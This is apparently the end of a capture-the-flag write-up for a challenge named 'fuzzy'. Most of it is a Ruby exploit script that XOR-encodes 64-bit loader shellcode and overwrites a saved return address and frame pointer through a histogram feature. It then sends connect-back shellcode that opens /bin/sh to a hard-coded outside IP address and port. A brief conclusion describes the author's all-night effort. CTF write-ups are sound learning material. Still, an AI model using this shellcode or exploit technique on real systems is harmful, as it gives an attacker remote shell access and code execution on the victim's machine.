# Keep track of how many bytes were printed, so we can print padding after
# (and avoid changing the size of the stack)
#
# I added this because I noticed addresses on the stack shifting relative
# to each other, a bit, though that may have been sleep-deprived daftness
@@n = 0
def my_print(str)
  print(str)
  @@n += str.length
end

# Code is 'encrypted' with a simple xor operation
def encode_shellcode(code)
  buf = ""

  0.upto(code.length-1) do |i|
    c = code[i].ord ^ 0xFF;

    # If encoded shellcode contains a newline, it won't work, so catch it early
    if(c == 0x0a)
      $stderr.puts("Shellcode has a newline! :(")
      exit
    end

    # Increment the histogram for this character
    @@used_chars[c] = @@used_chars[c].nil? ? 1 : @@used_chars[c] + 1

    # Append it to the buffer
    buf += c.chr
  end

  return buf
end

# This will edit memory at any offset (below 0x100) from the start of the
# histogram array. I wrote it because I got sick of doing this manually.
#
# Basically, it looks at two variables - the 'from' is the original, known
# value, and 'to' is the value we want it to be. It modifies each of the
# variables one byte at a time, by incrementing the byte.
#
# Each byte increment is one character in the output, so the more different
# the values are, the bigger the output gets (eventually getting too big)
def edit_memory(from, to, location)
  # Handle each of the 8 bytes, though in practice I think we only needed
  # the first two
  0.upto(7) do |i|
    # Get the before and after values for the current byte
    from_i = (from >> (8 * i)) & 0xFF
    to_i   = (to   >> (8 * i)) & 0xFF

    # As long as the bytes are different, add the current 'increment' character
    while(from_i != to_i) do
      # If we already have the location from the shellcode or something, don't
      # repeat it
      if(!@@used_chars[location+i].nil? && @@used_chars[location+i] > 0)
        $stderr.puts("Saved a character!")
        @@used_chars[location+i] -= 1
      else
        my_print((location+i).chr)
      end

      # Increment as a byte
      from_i = (from_i + 1) & 0xFF
    end
  end
end

# Choose 'histogram'
puts("1")

# The first part gets eaten, I'm not sure why
my_print(encode_shellcode("\x90" * 20))

# Encode the custom-written loader code that basically reads from the
# socket into some allocated memory, then runs it.
#
# Trivia: This is my first 64-bit shellcode! :)
#
# This had to be carefully constructed because it would influence the
# eventual histogram, which would modify the stack and therefore break
# everything.
my_print(encode_shellcode(

  "\xb8\x09\x00\x00\x00"     + # mov eax, 9 (mmap)
  "\xbf\x00\x00\x00\x41"     + # mov edi, 0x41000000 (addr)
  "\xbe\x00\x10\x00\x00"     + # mov esi, 0x1000 (size)
  "\xba\x07\x00\x00\x00"     + # mov edx, 7 (prot = RWX)
  "\x41\xba\x32\x00\x00\x00" + # mov r10d, 0x32 (flags = MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED)
  "\x41\xb8\x00\x00\x00\x00" + # mov r8d, 0 (fd)
  "\x41\xb9\x00\x00\x00\x00" + # mov r9d, 0 (offset)
  "\x0f\x05"                 + # syscall - mmap

  "\xbf\x98\xf8\xd0\xb0"     + # mov edi, ptr to socket ^ 0xb0b0b0b0
  "\x81\xf7\xb0\xb0\xb0\xb0" + # xor edi, 0xb0b0b0b0
  "\x48\x8b\x3f"             + # mov rdi, [rdi]

  "\xb8\x00\x00\x00\x00"     + # mov eax, 0 (read)
  "\xbe\x00\x00\x00\x41"     + # mov esi, 0x41000000 (buf)
  "\xba\x00\x20\x00\x00"     + # mov edx, 0x2000 (count)
  "\x0f\x05"                 + # syscall - read
  "\x56\xc3"                 + # push rsi / ret (jump to the buffer)
  "\xc3"                     + # ret

  "\xcd\x03" # int 3
))

# The 'decryption' function requires some NOPs (I think 6) followed by a return
# to identify the end of an encrypted function
my_print(encode_shellcode(("\x90" * 10) + "\xc3"))

# Increment the return address and the saved frame pointer
edit_memory(REAL_RETURN_ADDR, DESIRED_RETURN_ADDR, RETURN_OFFSET)
edit_memory(REAL_FP, DESIRED_FP, FP_OFFSET)

# Pad the line out with (encoded) NOPs. Note that my_print already adds to
# @@n, so the extra increment below counts every padding byte twice and the
# line ends up shorter than 0x300 bytes. It's left as-is because the offsets
# above were presumably tuned against exactly this input.
while(@@n < 0x300)
  my_print(encode_shellcode("\x90"))
  @@n += 1
end

# Add the final newline, which triggers the overwrites and stuff
puts()

# This is standard shellcode I found online and modified a tiny bit.
# It's what's read by the 'loader': a connect-back shell (socket, connect,
# dup2, execve /bin/sh) to SCIPADDR:SCPORT.
SCPORT = "\x41\x41" # port 16705
SCIPADDR = "\xce\xdc\xc4\x3b" # 206.220.196.59
puts("" +
  "\x48\x31\xc0\x48\x31\xff\x48\x31\xf6\x48\x31\xd2\x4d\x31\xc0\x6a" +
  "\x02\x5f\x6a\x01\x5e\x6a\x06\x5a\x6a\x29\x58\x0f\x05\x49\x89\xc0" +
  "\x48\x31\xf6\x4d\x31\xd2\x41\x52\xc6\x04\x24\x02\x66\xc7\x44\x24" +
  "\x02"+SCPORT+"\xc7\x44\x24\x04"+SCIPADDR+"\x48\x89\xe6\x6a\x10" +
  "\x5a\x41\x50\x5f\x6a\x2a\x58\x0f\x05\x48\x31\xf6\x6a\x03\x5e\x48" +
  "\xff\xce\x6a\x21\x58\x0f\x05\x75\xf6\x48\x31\xff\x57\x57\x5e\x5a" +
  "\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xef\x08\x57\x54" +
  "\x5f\x6a\x3b\x58\x0f\x05\0\0\0\0")

Conclusion

So, that’s my months-late writeup of fuzzy! I think I captured most of the details accurately. One thing I haven’t mentioned is that I ended up finishing it at about 6:30am, a solid 12 hours after I started! It certainly shouldn’t have been that difficult, but I took some long wrong turns. :)